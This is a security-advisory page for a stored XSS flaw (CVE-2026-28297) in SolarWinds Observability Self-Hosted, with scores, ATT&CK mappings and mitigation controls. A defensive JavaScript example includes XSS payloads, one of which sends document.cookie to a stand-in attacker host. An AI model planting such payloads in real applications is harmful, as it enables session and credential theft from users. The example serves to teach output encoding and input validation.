Cyber Posture

CVE-2026-28297 · Medium

Published: 26 March 2026
Modified: 31 March 2026
KEV Added: not listed
Patch: vendor advisory available (see Deeper analysis)
CVSS Score: 6.1 (CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N)
EPSS Score: 0.0003 (9.2nd percentile)
Risk Priority: 12 (weighted 60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2026-28297 is a medium-severity stored cross-site scripting (XSS, CWE-79) vulnerability in SolarWinds Observability Self-Hosted, with a CVSS v3.1 base score of 6.1 (Medium).

Operationally, exploitation maps to the MITRE ATT&CK technique Drive-by Compromise (T1189). EPSS ranks it at the 9.2nd percentile for exploit likelihood (well below the median), and it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).

Threat & Defense at a Glance

What attackers do: exploitation maps to Drive-by Compromise (T1189) and three other techniques. What defenders deploy: see the NIST 800-53 controls recommended below.
Threat & Defense Details

Mitigating Controls (NIST 800-53 r5, AI-generated)

prevent · vendor patch

Directly mitigates the stored XSS by requiring timely remediation through vendor patching, as specified in the SolarWinds advisory.

prevent · SI-10 Information Input Validation

Prevents injection of malicious scripts into stored data by validating all high-privilege user inputs before they are persisted in the self-hosted application.

prevent · SI-15 Information Output Filtering

Encodes or sanitizes stored data at the point where it is rendered, so that injected scripts do not execute in users' browsers. This is the control that closes CWE-79 regardless of how the data reached the store, which is why it stands on its own next to input validation.
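The two controls above, as an added example that is not code from this page or from SolarWinds: a stored-XSS round trip in Node.js in which a privileged user's stored profile fields are rendered once without and once with output encoding (SI-15), with an allow-list validator (SI-10) in front of the save path. The profile record, its field names, the HTML template and the validation policy are assumptions chosen for illustration; no SolarWinds endpoint is modelled.

```javascript
// Added example, not code from SolarWinds or from this page: a minimal
// stored-XSS round trip (CWE-79) with the two controls named above applied.
// The profile record, its field names and the HTML template are assumptions
// chosen for illustration; no SolarWinds endpoint is modelled.

// Constructed sample of what a high-privileged user (PR:H) might save.
// Two contexts are attacked: HTML text and a double-quoted attribute value.
const ATTACKER_PROFILE = {
  displayName: '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
  title: '" autofocus onfocus="alert(document.domain)',
};

// In-memory stand-in for the persistence layer. The payload survives the
// round trip unchanged, which is what makes this XSS "stored".
const store = new Map();
function saveProfile(userId, profile) { store.set(userId, { ...profile }); }
function loadProfile(userId) { return store.get(userId); }

// VULNERABLE: stored values are concatenated straight into the response.
function renderProfileVulnerable(userId) {
  const p = loadProfile(userId);
  return `<h1>${p.displayName}</h1><input value="${p.title}">`;
}

// SI-15 (output filtering): HTML-entity encode at the sink. For HTML text
// and double-quoted attribute values, these five characters suffice.
function htmlEncode(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// HARDENED: encode every untrusted value where it is emitted, regardless
// of what validation did on the way in.
function renderProfileHardened(userId) {
  const p = loadProfile(userId);
  return `<h1>${htmlEncode(p.displayName)}</h1><input value="${htmlEncode(p.title)}">`;
}

// SI-10 (input validation): allow-list the fields at the trust boundary
// before persistence, and reject rather than "clean" what does not match.
const NAME_RE = /^[\p{L}\p{N} .'-]{1,64}$/u;   // assumed policy for these fields
function validateProfile(profile) {
  return ['displayName', 'title'].filter((f) => !NAME_RE.test(profile[f] ?? ''));
}
function saveProfileValidated(userId, profile) {
  const bad = validateProfile(profile);
  if (bad.length) throw new Error(`rejected fields: ${bad.join(', ')}`);
  saveProfile(userId, profile);
}

// Minimal tag/attribute scanner (not a full HTML parser) that mimics how a
// browser tokenizes the output; it reports <script> elements and on*
// event-handler attributes, i.e. the places where injected code would run.
function activeContent(html) {
  const findings = [];
  const tagRe = /<([a-zA-Z][\w-]*)([^>]*)>/g;
  const attrRe = /([^\s=\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  for (const t of html.matchAll(tagRe)) {
    const name = t[1].toLowerCase();
    if (name === 'script') findings.push('script');
    for (const a of t[2].matchAll(attrRe)) {
      const attr = a[1].toLowerCase();
      if (attr.startsWith('on')) findings.push(`${name}@${attr}`);
    }
  }
  return findings;
}

// Demonstration: the unvalidated path stores the payload, then the two
// renderers are compared, then the validated path is tried.
saveProfile('admin', ATTACKER_PROFILE);
console.log(activeContent(renderProfileVulnerable('admin'))); // [ 'script', 'input@onfocus' ]
console.log(activeContent(renderProfileHardened('admin')));   // []
try {
  saveProfileValidated('admin2', ATTACKER_PROFILE);
} catch (e) {
  console.log(e.message); // rejected fields: displayName, title
}
```

Run it with `node`. The point to take from it is the order of defence: the validator stops these payloads at the trust boundary, but the encoded renderer is what keeps the page safe for data that reached the store by another route (an older build without the validator, an API, a database restore), which is why the page lists output filtering as a control in its own right.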

MITRE ATT&CK Enterprise Techniques (AI-generated)

T1189 Drive-by Compromise (Initial Access)
Adversaries may gain access to a system through a user visiting a website over the normal course of browsing.
T1210 Exploitation of Remote Services (Lateral Movement)
Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network.
T1539 Steal Web Session Cookie (Credential Access)
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.
T1555.003 Credentials from Web Browsers (Credential Access)
Adversaries may acquire credentials from web browsers by reading files specific to the target browser.
Why these techniques?

Stored XSS in a legitimate SolarWinds application turns a page that users already visit into a drive-by delivery point (T1189); the payload reaches victims through the exposed web service (T1210); and the injected script can read session cookies that are not flagged HttpOnly (T1539) or target credentials held in the browser (T1555.003).

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

NVD Description

SolarWinds Observability Self-Hosted was found to be affected by a stored cross-site scripting vulnerability, which when exploited, can lead to unintended script execution.

Deeper analysis (AI-generated)

CVE-2026-28297 is a stored cross-site scripting (XSS) vulnerability, classified under CWE-79, affecting SolarWinds Observability Self-Hosted. Published on 26 March 2026, it carries a CVSS v3.1 base score of 6.1 (AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N). When exploited, the vulnerability enables unintended script execution within the affected application.

The vector states that the attacker needs high privileges (PR:H) and adjacent-network access (AV:A), with low attack complexity (AC:L) and no user interaction (UI:N). In practice the payload is stored by a privileged account and runs later in the browser of whoever views the affected page. Successful exploitation has high confidentiality (C:H) and integrity (I:H) impact, because the injected script runs with the viewing user's session and can read data or perform actions as that user, while availability is unaffected (A:N) and scope is unchanged (S:U).

SolarWinds has published a security advisory at https://www.solarwinds.com/trust-center/security-advisories/CVE-2026-28297 and release notes for Hybrid Cloud Observability (HCO) 2026.1.1 at https://documentation.solarwinds.com/en/success_center/orionplatform/content/release_notes/hco_2026-1-1_release_notes.htm, which carry the mitigation and patching instructions. Note that the affected-product entry below lists versions up to and including 2026.1.1, so confirm the exact fixed build against the advisory rather than assuming the 2026.1.1 release itself is clean.

Details

CWE(s): CWE-79 (Cross-site Scripting)

Affected Products: SolarWinds Observability Self-Hosted, versions ≤ 2026.1.1

CVEs Like This One

CVE-2026-28298 · same product: SolarWinds Observability Self-Hosted
CVE-2025-40549 · same product class: network monitoring / SIEM
CVE-2025-40547 · same product class: network monitoring / SIEM
CVE-2025-40551 · same product class: network monitoring / SIEM
CVE-2025-40536 · same product class: network monitoring / SIEM
CVE-2024-28988 · same product class: network monitoring / SIEM
CVE-2025-40552 · same product class: network monitoring / SIEM
CVE-2025-26399 · same product class: network monitoring / SIEM
CVE-2025-40554 · same product class: network monitoring / SIEM
CVE-2025-40537 · same product class: network monitoring / SIEM

References